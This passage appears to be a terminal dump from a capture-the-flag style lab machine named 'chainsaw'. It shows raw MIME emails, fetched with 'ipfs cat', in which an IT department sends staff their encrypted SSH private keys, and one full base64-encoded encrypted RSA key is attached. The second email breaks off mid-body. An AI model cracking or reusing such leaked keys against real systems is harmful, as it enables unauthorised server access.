Date: Thu, 13 Dec 2018 19:49:35 +0000
Mime-Version: 1.0
Content-Type: multipart/mixed;boundary=---------------------d92de43a05ff956534aefebf0c503504
To: laraaxelrod600@protonmail.ch <laraaxelrod600@protonmail.ch>
X-Attached: lara.key.enc
Message-Id: <yI3rYTGGDTn32kNwm-ZAdUu-AASO5qJMFyxMnUDAKsnl52gAnqoDbAcKVQ2IyDEPIEHrLPhioAPW0ibGqhOYe9TGrokNwyITaY3NEh7ftSw=@protonmail.ch>
Received: from mail.protonmail.ch by mail.protonmail.ch; Thu, 13 Dec 2018 14:49:36 -0500
X-Original-To: laraaxelrod600@protonmail.ch
Return-Path: <chainsaw_admin@protonmail.ch>
Delivered-To: laraaxelrod600@protonmail.ch

-----------------------d92de43a05ff956534aefebf0c503504
Content-Type: multipart/related;boundary=---------------------e522796298409e871550f5574fb362fc

-----------------------e522796298409e871550f5574fb362fc
Content-Type: text/html;charset=utf-8
Content-Transfer-Encoding: base64

PGRpdiBzdHlsZT0iY29sb3I6IHJnYig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAm
cXVvdDtIZWx2ZXRpY2EgTmV1ZSZxdW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNp
emU6IDE0cHg7IGZvbnQtc3R5bGU6IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9y
bWFsOyBmb250LXZhcmlhbnQtY2Fwczogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXIt
c3BhY2luZzogbm9ybWFsOyBvcnBoYW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRl
bnQ6IDBweDsgdGV4dC10cmFuc2Zvcm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93
czogMjsgd29yZC1zcGFjaW5nOiAwcHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsg
YmFja2dyb3VuZC1jb2xvcjogcmdiKDI1NSwgMjU1LCAyNTUpOyB0ZXh0LWRlY29yYXRpb24tc3R5
bGU6IGluaXRpYWw7IHRleHQtZGVjb3JhdGlvbi1jb2xvcjogaW5pdGlhbDsiPkxhcmEsPGJyPjwv
ZGl2PjxkaXYgc3R5bGU9ImNvbG9yOiByZ2IoODUsIDg1LCA4NSk7IGZvbnQtZmFtaWx5OiBBcmlh
bCwgJnF1b3Q7SGVsdmV0aWNhIE5ldWUmcXVvdDssIEhlbHZldGljYSwgc2Fucy1zZXJpZjsgZm9u
dC1zaXplOiAxNHB4OyBmb250LXN0eWxlOiBub3JtYWw7IGZvbnQtdmFyaWFudC1saWdhdHVyZXM6
IG5vcm1hbDsgZm9udC12YXJpYW50LWNhcHM6IG5vcm1hbDsgZm9udC13ZWlnaHQ6IDQwMDsgbGV0
dGVyLXNwYWNpbmc6IG5vcm1hbDsgb3JwaGFuczogMjsgdGV4dC1hbGlnbjogc3RhcnQ7IHRleHQt
aW5kZW50OiAwcHg7IHRleHQtdHJhbnNmb3JtOiBub25lOyB3aGl0ZS1zcGFjZTogbm9ybWFsOyB3
aWRvd3M6IDI7IHdvcmQtc3BhY2luZzogMHB4OyAtd2Via2l0LXRleHQtc3Ryb2tlLXdpZHRoOiAw
cHg7IGJhY2tncm91bmQtY29sb3I6IHJnYigyNTUsIDI1NSwgMjU1KTsgdGV4dC1kZWNvcmF0aW9u
LXN0eWxlOiBpbml0aWFsOyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGluaXRpYWw7Ij48YnI+PC9k
aXY+PGRpdiBzdHlsZT0iY29sb3I6IHJnYig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFs
LCAmcXVvdDtIZWx2ZXRpY2EgTmV1ZSZxdW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250
LXNpemU6IDE0cHg7IGZvbnQtc3R5bGU6IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczog
bm9ybWFsOyBmb250LXZhcmlhbnQtY2Fwczogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0
ZXItc3BhY2luZzogbm9ybWFsOyBvcnBoYW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1p
bmRlbnQ6IDBweDsgdGV4dC10cmFuc2Zvcm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdp
ZG93czogMjsgd29yZC1zcGFjaW5nOiAwcHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBw
eDsgYmFja2dyb3VuZC1jb2xvcjogcmdiKDI1NSwgMjU1LCAyNTUpOyB0ZXh0LWRlY29yYXRpb24t
c3R5bGU6IGluaXRpYWw7IHRleHQtZGVjb3JhdGlvbi1jb2xvcjogaW5pdGlhbDsiPkkgYW0gd3Jp
dGluZyB0aGlzIGVtYWlsIGluIHJlZmVyZW5jZSB0byB0aGUgbWV0aG9kIG9uIGhvdyB3ZSBhY2Nl
c3Mgb3VyIExpbnV4IHNlcnZlciBmcm9tIG5vdyBvbi4gRHVlIHRvIHNlY3VyaXR5IHJlYXNvbnMs
IHdlIGhhdmUgZGlzYWJsZWQgU1NIIHBhc3N3b3JkIGF1dGhlbnRpY2F0aW9uIGFuZCBpbnN0ZWFk
IHdlIHdpbGwgdXNlIHByaXZhdGUvcHVibGljIGtleSBwYWlycyB0byBzZWN1cmVseSBhbmQgY29u
dmVuaWVudGx5IGFjY2VzcyB0aGUgbWFjaGluZS48YnI+PC9kaXY+PGRpdiBzdHlsZT0iY29sb3I6
IHJnYig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAmcXVvdDtIZWx2ZXRpY2EgTmV1
ZSZxdW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNpemU6IDE0cHg7IGZvbnQtc3R5
bGU6IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9ybWFsOyBmb250LXZhcmlhbnQt
Y2Fwczogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXItc3BhY2luZzogbm9ybWFsOyBv
cnBoYW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRlbnQ6IDBweDsgdGV4dC10cmFu
c2Zvcm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93czogMjsgd29yZC1zcGFjaW5n
OiAwcHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsgYmFja2dyb3VuZC1jb2xvcjog
cmdiKDI1NSwgMjU1LCAyNTUpOyB0ZXh0LWRlY29yYXRpb24tc3R5bGU6IGluaXRpYWw7IHRleHQt
ZGVjb3JhdGlvbi1jb2xvcjogaW5pdGlhbDsiPjxicj48L2Rpdj48ZGl2IHN0eWxlPSJjb2xvcjog
cmdiKDg1LCA4NSwgODUpOyBmb250LWZhbWlseTogQXJpYWwsICZxdW90O0hlbHZldGljYSBOZXVl
JnF1b3Q7LCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWY7IGZvbnQtc2l6ZTogMTRweDsgZm9udC1zdHls
ZTogbm9ybWFsOyBmb250LXZhcmlhbnQtbGlnYXR1cmVzOiBub3JtYWw7IGZvbnQtdmFyaWFudC1j
YXBzOiBub3JtYWw7IGZvbnQtd2VpZ2h0OiA0MDA7IGxldHRlci1zcGFjaW5nOiBub3JtYWw7IG9y
cGhhbnM6IDI7IHRleHQtYWxpZ246IHN0YXJ0OyB0ZXh0LWluZGVudDogMHB4OyB0ZXh0LXRyYW5z
Zm9ybTogbm9uZTsgd2hpdGUtc3BhY2U6IG5vcm1hbDsgd2lkb3dzOiAyOyB3b3JkLXNwYWNpbmc6
IDBweDsgLXdlYmtpdC10ZXh0LXN0cm9rZS13aWR0aDogMHB4OyBiYWNrZ3JvdW5kLWNvbG9yOiBy
Z2IoMjU1LCAyNTUsIDI1NSk7IHRleHQtZGVjb3JhdGlvbi1zdHlsZTogaW5pdGlhbDsgdGV4dC1k
ZWNvcmF0aW9uLWNvbG9yOiBpbml0aWFsOyI+QXR0YWNoZWQgeW91IHdpbGwgZmluZCB5b3VyIHBl
cnNvbmFsIGVuY3J5cHRlZCBwcml2YXRlIGtleS4gUGxlYXNlIGFzayZuYnNwO3JlY2VwdGlvbiBk
ZXNrIGZvciB5b3VyIHBhc3N3b3JkLCB0aGVyZWZvcmUgYmUgc3VyZSB0byBicmluZyB5b3VyIHZh
bGlkIElEIGFzIGFsd2F5cy48YnI+PC9kaXY+PGRpdiBzdHlsZT0iY29sb3I6IHJnYig4NSwgODUs
IDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAmcXVvdDtIZWx2ZXRpY2EgTmV1ZSZxdW90OywgSGVs
dmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNpemU6IDE0cHg7IGZvbnQtc3R5bGU6IG5vcm1hbDsg
Zm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9ybWFsOyBmb250LXZhcmlhbnQtY2Fwczogbm9ybWFs
OyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXItc3BhY2luZzogbm9ybWFsOyBvcnBoYW5zOiAyOyB0
ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRlbnQ6IDBweDsgdGV4dC10cmFuc2Zvcm06IG5vbmU7
IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93czogMjsgd29yZC1zcGFjaW5nOiAwcHg7IC13ZWJr
aXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsgYmFja2dyb3VuZC1jb2xvcjogcmdiKDI1NSwgMjU1
LCAyNTUpOyB0ZXh0LWRlY29yYXRpb24tc3R5bGU6IGluaXRpYWw7IHRleHQtZGVjb3JhdGlvbi1j
b2xvcjogaW5pdGlhbDsiPjxicj48L2Rpdj48ZGl2IHN0eWxlPSJjb2xvcjogcmdiKDg1LCA4NSwg
ODUpOyBmb250LWZhbWlseTogQXJpYWwsICZxdW90O0hlbHZldGljYSBOZXVlJnF1b3Q7LCBIZWx2
ZXRpY2EsIHNhbnMtc2VyaWY7IGZvbnQtc2l6ZTogMTRweDsgZm9udC1zdHlsZTogbm9ybWFsOyBm
b250LXZhcmlhbnQtbGlnYXR1cmVzOiBub3JtYWw7IGZvbnQtdmFyaWFudC1jYXBzOiBub3JtYWw7
IGZvbnQtd2VpZ2h0OiA0MDA7IGxldHRlci1zcGFjaW5nOiBub3JtYWw7IG9ycGhhbnM6IDI7IHRl
eHQtYWxpZ246IHN0YXJ0OyB0ZXh0LWluZGVudDogMHB4OyB0ZXh0LXRyYW5zZm9ybTogbm9uZTsg
d2hpdGUtc3BhY2U6IG5vcm1hbDsgd2lkb3dzOiAyOyB3b3JkLXNwYWNpbmc6IDBweDsgLXdlYmtp
dC10ZXh0LXN0cm9rZS13aWR0aDogMHB4OyBiYWNrZ3JvdW5kLWNvbG9yOiByZ2IoMjU1LCAyNTUs
IDI1NSk7IHRleHQtZGVjb3JhdGlvbi1zdHlsZTogaW5pdGlhbDsgdGV4dC1kZWNvcmF0aW9uLWNv
bG9yOiBpbml0aWFsOyI+U2luY2VyZWx5LDxicj48L2Rpdj48ZGl2IHN0eWxlPSJjb2xvcjogcmdi
KDg1LCA4NSwgODUpOyBmb250LWZhbWlseTogQXJpYWwsICZxdW90O0hlbHZldGljYSBOZXVlJnF1
b3Q7LCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWY7IGZvbnQtc2l6ZTogMTRweDsgZm9udC1zdHlsZTog
bm9ybWFsOyBmb250LXZhcmlhbnQtbGlnYXR1cmVzOiBub3JtYWw7IGZvbnQtdmFyaWFudC1jYXBz
OiBub3JtYWw7IGZvbnQtd2VpZ2h0OiA0MDA7IGxldHRlci1zcGFjaW5nOiBub3JtYWw7IG9ycGhh
bnM6IDI7IHRleHQtYWxpZ246IHN0YXJ0OyB0ZXh0LWluZGVudDogMHB4OyB0ZXh0LXRyYW5zZm9y
bTogbm9uZTsgd2hpdGUtc3BhY2U6IG5vcm1hbDsgd2lkb3dzOiAyOyB3b3JkLXNwYWNpbmc6IDBw
eDsgLXdlYmtpdC10ZXh0LXN0cm9rZS13aWR0aDogMHB4OyBiYWNrZ3JvdW5kLWNvbG9yOiByZ2Io
MjU1LCAyNTUsIDI1NSk7IHRleHQtZGVjb3JhdGlvbi1zdHlsZTogaW5pdGlhbDsgdGV4dC1kZWNv
cmF0aW9uLWNvbG9yOiBpbml0aWFsOyI+SVQgQWRtaW5pc3RyYXRpb24gRGVwYXJ0bWVudDxicj48
L2Rpdj4=
-----------------------e522796298409e871550f5574fb362fc--
-----------------------d92de43a05ff956534aefebf0c503504
Content-Type: application/octet-stream; filename="lara.key.enc"; name="lara.key.enc"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="lara.key.enc"; name="lara.key.enc"

LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRF
Sy1JbmZvOiBERVMtRURFMy1DQkMsREY1RTlERDUzQzEyM0IwNgoKcUxReDlvd1pZQ2NPVkVtRVlL
cUwyMElmamhOQi9yOEJNenFsaG5Wc1R4U05hN0VtUDZYRVFDRDArbGtWUnNmdwpyWFBJWng1RS9F
TXNJQXlZeno2bldWeDlCUXIvOXVHYzZRa3hQVVpTc0g2RjlPOGNucnB1M2hSb1F0anpxWDZVClJT
cDdSSlIzQXN6TDJ2bnhDaXNDSU5CUG4rMDhRSVJydWdsdVZVUWtXdnd1TEtDVWNOdEV6aG1yK2FZ
T0FRT20KTmlialFjSjVrcHJua2p2K3NGL3JYNS81NFlPVWZ4RGJlZGg2dktMYzFaOERCM3Q2NmtR
NjZZK2tzdzNxWjRKTQpUSFlsYXJMLzBLb0xRK25VQXExZERndTRUaHJ1b1g1d25wdE9LMG04eG5N
MXk3T0NjLzZEK3NGTk13QTI0UFBECmJpK3Q3Qi9RL1BkMkRCUUQxVEd4ZmlJYnJQVzU4R2hEOW1H
YTJmZ3A0VjF4QnE4ZXY0R1lOUWdNcVUwUTZ4enoKeUNMUjFwZ0tZNUFiYm16K3FkWE95dW95eTJj
ZVJ3QlFUSFB3VTVnakIrV2JJc3FJbEJ1THY1bmdDVkJWQld5Ywp2cjVHd2lJbGNyUFhXU201NC9X
TXNGbDc2UHRmOWhpR001eElhaGRmVm1yZEx0SWc2cE01RHJzZThUVVdlSmFLCmhxWUtoMlFrZzB4
aEN0aTQxbnU3dHhVSUhic1EyRlFyQldodXFBakpMcXlUa1UxMkYxZ0hBSFNSTUlLTG5tYVAKUjYz
a3VpcGhZcUNjVUNFNDh5SElOeHNQb2JVa1dIMElPUm5UVS9vYS9EUVplWkl6bVp5c2hJWGhsV2lS
d2lkMQpVVXJnLzExbW9HTldFZVNNbmtkdURGdEZtL1V3UStMa2tZd1JPVnJQQythN3NRU25UZ2tz
aVdmSkNpRWVoM04rCmlDZjhYYjQ5Q0NEUUhSNmtKK3JTaHRJdW1RcTA5dlVVM2o0OUV1SWVSRklL
c3U4U0tEZWJiTnBmK1FxUldVUHMKQy83Z2libHlSWXVDenhhY3RSR3Irc1ZuUEdCc1VtL05vYXp5
R09neGlPZmtjTWE2UG4rU0RJdUN1bTFUWjJhdQpxMjl6bG1FSGlhVlE4WXdZcGg5NGhXSUJwUnkv
bkMycTNsSlRieFJUc1VNc1BDT1o1b2ZjNUZuYWpkUHRJVWRoCmpRZllJdG1jbEsxQUxHWGtBU29t
cnpFYTlSSXNxMW9aM04xangxTDRqWXZpdUxEeGlpTTVZY2pQb2h1S3NTeUcKbDRadlJFYVRZb2lZ
RzFrWER3YmxjZWNXVGZUMy9JTjM0aVlhSWZxdFhTUElTVCtYVlQrOFZlVGRTUWlHL08yZgpXeVli
bDJPdi9xcXZYazRkQXFFd1Bqa1FqUEFlbkhxQW14cTVTODB6bVpoS3dhQkpEV2xPbGo4ZHNUMFFG
Ni93Ci9HZ08yaFRJNE9ZRU9XVWRueDBweHFobVYySlcxTmFvVGMxYnEvOTIzN2RhSnQrUm9saUZJ
dGowYVltTjhiUTEKZDBvdlB1L2Y0bHJNRG96REQ5Z2xkOUphRU80U1RIdU9sOUE3MldLc2ZQcXJx
djVXc1ovWXdVNHlTOWVhOUtOdQpTdGVnYmwyUDZCMFlqN2FWSTgxdWZxdXNYeUIrUXdBOFNOUWw4
b1dlWUhoNVN3WmpnNDYzU0RzV3JZZ3ZMemRNCi9TZm93OE1kT3RhOEpjTndobTErMytlQ0IzNTJ2
alZJK2VMWkZ6QUFmc1BrdWp1K0k2YmliNGN4Si92b1krSXkKcGNaUWt5RWNtb205eUg3d0gvR2l6
cVFHZXVBL0hmSmxWM0JUTWxleldTTHF5Z1NzRG1SbWp0L2ZueUFtZm9FNwpLOE01Qml6a3VtYjNv
Y0tCYjhxNzFSdWdtaDA4SERtNWRVYWlFSkI1RHg0S3o1WUsrUTZBMnRzOTRqRjM0ZnFtCnJoSXlB
eFhtdkU5dXVRRnJ1MnFSdjg4YUNtTEEzaW5ab1ZWT2c4MFJraEhDMGl5MjdVSWx3UWdMRElhenFm
MmsKdlhKaWR4VlA0RXhucE52ZlVOL1AzOS9mYkVIZGdaTTA2RlBqc1lORGppSHl4bWdzeDBhbkFJ
UnkySXNyQW5PNQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQ==
-----------------------d92de43a05ff956534aefebf0c503504--
administrator@chainsaw:/home$ 


administrator@chainsaw:/home$ ipfs cat QmXwXzVYKgYZEXU1dgCKeejT87Knw9nydGcuUZrjwNb2Me
< cat QmXwXzVYKgYZEXU1dgCKeejT87Knw9nydGcuUZrjwNb2Me
X-Pm-Origin: internal
X-Pm-Content-Encryption: end-to-end
Subject: Ubuntu Server Private RSA Key
From: IT Department <chainsaw_admin@protonmail.ch>
Date: Thu, 13 Dec 2018 19:50:15 +0000
Mime-Version: 1.0
Content-Type: multipart/mixed;boundary=---------------------7f20f83acebf27b41b3213e5d27e6f04
To: wendyrhoades600@protonmail.ch <wendyrhoades600@protonmail.ch>
X-Attached: wendy.key.enc
Message-Id: <lU0loVZLX7_aoawc-jSqN5oas0AHAQ77KHiSyPZDgXo2kDNj6ikPL2nnYlkGw1F24Gcb6VWzWeLnVqZRD50uAuLh1RhpDK67kr0SuwfMyKQ=@protonmail.ch>
Received: from mail.protonmail.ch by mail.protonmail.ch; Thu, 13 Dec 2018 14:50:18 -0500
X-Original-To: wendyrhoades600@protonmail.ch
Return-Path: <chainsaw_admin@protonmail.ch>
Delivered-To: wendyrhoades600@protonmail.ch

-----------------------7f20f83acebf27b41b3213e5d27e6f04
Content-Type: multipart/related;boundary=---------------------b83a7caaf0d2b0cf7e7d1db209fe02c8

-----------------------b83a7caaf0d2b0cf7e7d1db209fe02c8
Content-Type: text/html;charset=utf-8
Content-Transfer-Encoding: base64

PGRpdiBzdHlsZT0iY29sb3I6IHJnYig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAm
cXVvdDtIZWx2ZXRpY2EgTmV1ZSZxdW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNp
emU6IDE0cHg7IGZvbnQtc3R5bGU6IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9y
bWFsOyBmb250LXZhcmlhbnQtY2Fwczogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXIt
c3BhY2luZzogbm9ybWFsOyBvcnBoYW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRl
bnQ6IDBweDsgdGV4dC10cmFuc2Zvcm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93
czogMjsgd29yZC1zcGFjaW5nOiAwcHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsg
dGV4dC1kZWNvcmF0aW9uLXN0eWxlOiBpbml0aWFsOyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGlu
aXRpYWw7IGJhY2tncm91bmQtY29sb3I6IHJnYigyNTUsIDI1NSwgMjU1KTsiPldlbmR5LDxicj48
L2Rpdj48ZGl2IHN0eWxlPSJjb2xvcjogcmdiKDg1LCA4NSwgODUpOyBmb250LWZhbWlseTogQXJp
YWwsICZxdW90O0hlbHZldGljYSBOZXVlJnF1b3Q7LCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWY7IGZv
bnQtc2l6ZTogMTRweDsgZm9udC1zdHlsZTogbm9ybWFsOyBmb250LXZhcmlhbnQtbGlnYXR1cmVz
OiBub3JtYWw7IGZvbnQtdmFyaWFudC1jYXBzOiBub3JtYWw7IGZvbnQtd2VpZ2h0OiA0MDA7IGxl
dHRlci1zcGFjaW5nOiBub3JtYWw7IG9ycGhhbnM6IDI7IHRleHQtYWxpZ246IHN0YXJ0OyB0ZXh0
LWluZGVudDogMHB4OyB0ZXh0LXRyYW5zZm9ybTogbm9uZTsgd2hpdGUtc3BhY2U6IG5vcm1hbDsg
d2lkb3dzOiAyOyB3b3JkLXNwYWNpbmc6IDBweDsgLXdlYmtpdC10ZXh0LXN0cm9rZS13aWR0aDog
MHB4OyB0ZXh0LWRlY29yYXRpb24tc3R5bGU6IGluaXRpYWw7IHRleHQtZGVjb3JhdGlvbi1jb2xv
cjogaW5pdGlhbDsgYmFja2dyb3VuZC1jb2xvcjogcmdiKDI1NSwgMjU1LCAyNTUpOyI+PGJyPjwv
ZGl2PjxkaXYgc3R5bGU9ImNvbG9yOiByZ2IoODUsIDg1LCA4NSk7IGZvbnQtZmFtaWx5OiBBcmlh
bCwgJnF1b3Q7SGVsdmV0aWNhIE5ldWUmcXVvdDssIEhlbHZldGljYSwgc2Fucy1zZXJpZjsgZm9u
dC1zaXplOiAxNHB4OyBmb250LXN0eWxlOiBub3JtYWw7IGZvbnQtdmFyaWFudC1saWdhdHVyZXM6
IG5vcm1hbDsgZm9udC12YXJpYW50LWNhcHM6IG5vcm1hbDsgZm9udC13ZWlnaHQ6IDQwMDsgbGV0
dGVyLXNwYWNpbmc6IG5vcm1hbDsgb3JwaGFuczogMjsgdGV4dC1hbGlnbjogc3RhcnQ7IHRleHQt
aW5kZW50OiAwcHg7IHRleHQtdHJhbnNmb3JtOiBub25lOyB3aGl0ZS1zcGFjZTogbm9ybWFsOyB3
aWRvd3M6IDI7IHdvcmQtc3BhY2luZzogMHB4OyAtd2Via2l0LXRleHQtc3Ryb2tlLXdpZHRoOiAw
cHg7IHRleHQtZGVjb3JhdGlvbi1zdHlsZTogaW5pdGlhbDsgdGV4dC1kZWNvcmF0aW9uLWNvbG9y
OiBpbml0aWFsOyBiYWNrZ3JvdW5kLWNvbG9yOiByZ2IoMjU1LCAyNTUsIDI1NSk7Ij5JIGFtIHdy
aXRpbmcgdGhpcyBlbWFpbCBpbiByZWZlcmVuY2UgdG8gdGhlIG1ldGhvZCBvbiBob3cgd2UgYWNj
ZXNzIG91ciBMaW51eCBzZXJ2ZXIgZnJvbSBub3cgb24uIER1ZSB0byBzZWN1cml0eSByZWFzb25z
LCB3ZSBoYXZlIGRpc2FibGVkIFNTSCBwYXNzd29yZCBhdXRoZW50aWNhdGlvbiBhbmQgaW5zdGVh
ZCB3ZSB3aWxsIHVzZSBwcml2YXRlL3B1YmxpYyBrZXkgcGFpcnMgdG8gc2VjdXJlbHkgYW5kIGNv
bnZlbmllbnRseSBhY2Nlc3MgdGhlIG1hY2hpbmUuPGJyPjwvZGl2PjxkaXYgc3R5bGU9ImNvbG9y
OiByZ2IoODUsIDg1LCA4NSk7IGZvbnQtZmFtaWx5OiBBcmlhbCwgJnF1b3Q7SGVsdmV0aWNhIE5l
dWUmcXVvdDssIEhlbHZldGljYSwgc2Fucy1zZXJpZjsgZm9udC1zaXplOiAxNHB4OyBmb250LXN0
eWxlOiBub3JtYWw7IGZvbnQtdmFyaWFudC1saWdhdHVyZXM6IG5vcm1hbDsgZm9udC12YXJpYW50
LWNhcHM6IG5vcm1hbDsgZm9udC13ZWlnaHQ6IDQwMDsgbGV0dGVyLXNwYWNpbmc6IG5vcm1hbDsg
b3JwaGFuczogMjsgdGV4dC1hbGlnbjogc3RhcnQ7IHRleHQtaW5kZW50OiAwcHg7IHRleHQtdHJh
bnNmb3JtOiBub25lOyB3aGl0ZS1zcGFjZTogbm9ybWFsOyB3aWRvd3M6IDI7IHdvcmQtc3BhY2lu
ZzogMHB4OyAtd2Via2l0LXRleHQtc3Ryb2tlLXdpZHRoOiAwcHg7IHRleHQtZGVjb3JhdGlvbi1z
dHlsZTogaW5pdGlhbDsgdGV4dC1kZWNvcmF0aW9uLWNvbG9yOiBpbml0aWFsOyBiYWNrZ3JvdW5k
LWNvbG9yOiByZ2IoMjU1LCAyNTUsIDI1NSk7Ij48YnI+PC9kaXY+PGRpdiBzdHlsZT0iY29sb3I6
IHJnYig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAmcXVvdDtIZWx2ZXRpY2EgTmV1
ZSZxdW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNpemU6IDE0cHg7IGZvbnQtc3R5
bGU6IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9ybWFsOyBmb250LXZhcmlhbnQt
Y2Fwczogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXItc3BhY2luZzogbm9ybWFsOyBv
cnBoYW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRlbnQ6IDBweDsgdGV4dC10cmFu
c2Zvcm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93czogMjsgd29yZC1zcGFjaW5n
OiAwcHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsgdGV4dC1kZWNvcmF0aW9uLXN0
eWxlOiBpbml0aWFsOyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGluaXRpYWw7IGJhY2tncm91bmQt
Y29sb3I6IHJnYigyNTUsIDI1NSwgMjU1KTsiPkF0dGFjaGVkIHlvdSB3aWxsIGZpbmQgeW91ciBw
ZXJzb25hbCBlbmNyeXB0ZWQgcHJpdmF0ZSBrZXkuIFBsZWFzZSBhc2smbmJzcDtyZWNlcHRpb24g
ZGVzayBmb3IgeW91ciBwYXNzd29yZCwgdGhlcmVmb3JlIGJlIHN1cmUgdG8gYnJpbmcgeW91ciB2
YWxpZCBJRCBhcyBhbHdheXMuPGJyPjwvZGl2PjxkaXYgc3R5bGU9ImNvbG9yOiByZ2IoODUsIDg1
LCA4NSk7IGZvbnQtZmFtaWx5OiBBcmlhbCwgJnF1b3Q7SGVsdmV0aWNhIE5ldWUmcXVvdDssIEhl
bHZldGljYSwgc2Fucy1zZXJpZjsgZm9udC1zaXplOiAxNHB4OyBmb250LXN0eWxlOiBub3JtYWw7
IGZvbnQtdmFyaWFudC1saWdhdHVyZXM6IG5vcm1hbDsgZm9udC12YXJpYW50LWNhcHM6IG5vcm1h
bDsgZm9udC13ZWlnaHQ6IDQwMDsgbGV0dGVyLXNwYWNpbmc6IG5vcm1hbDsgb3JwaGFuczogMjsg
dGV4dC1hbGlnbjogc3RhcnQ7IHRleHQtaW5kZW50OiAwcHg7IHRleHQtdHJhbnNmb3JtOiBub25l
OyB3aGl0ZS1zcGFjZTogbm9ybWFsOyB3aWRvd3M6IDI7IHdvcmQtc3BhY2luZzogMHB4OyAtd2Vi
a2l0LXRleHQtc3Ryb2tlLXdpZHRoOiAwcHg7IHRleHQtZGVjb3JhdGlvbi1zdHlsZTogaW5pdGlh
bDsgdGV4dC1kZWNvcmF0aW9uLWNvbG9yOiBpbml0aWFsOyBiYWNrZ3JvdW5kLWNvbG9yOiByZ2Io
MjU1LCAyNTUsIDI1NSk7Ij48YnI+PC9kaXY+PGRpdiBzdHlsZT0iY29sb3I6IHJnYig4NSwgODUs
IDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAmcXVvdDtIZWx2ZXRpY2EgTmV1ZSZxdW90OywgSGVs
dmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNpemU6IDE0cHg7IGZvbnQtc3R5bGU6IG5vcm1hbDsg
Zm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9ybWFsOyBmb250LXZhcmlhbnQtY2Fwczogbm9ybWFs
OyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXItc3BhY2luZzogbm9ybWFsOyBvcnBoYW5zOiAyOyB0
ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRlbnQ6IDBweDsgdGV4dC10cmFuc2Zvcm06IG5vbmU7
IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93czogMjsgd29yZC1zcGFjaW5nOiAwcHg7IC13ZWJr
aXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsgdGV4dC1kZWNvcmF0aW9uLXN0eWxlOiBpbml0aWFs
OyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGluaXRpYWw7IGJhY2tncm91bmQtY29sb3I6IHJnYigy
NTUsIDI1NSwgMjU1KTsiPlNpbmNlcmVseSw8YnI+PC9kaXY+PGRpdiBzdHlsZT0iY29sb3I6IHJn
Yig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAmcXVvdDtIZWx2ZXRpY2EgTmV1ZSZx
dW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNpemU6IDE0cHg7IGZvbnQtc3R5bGU6
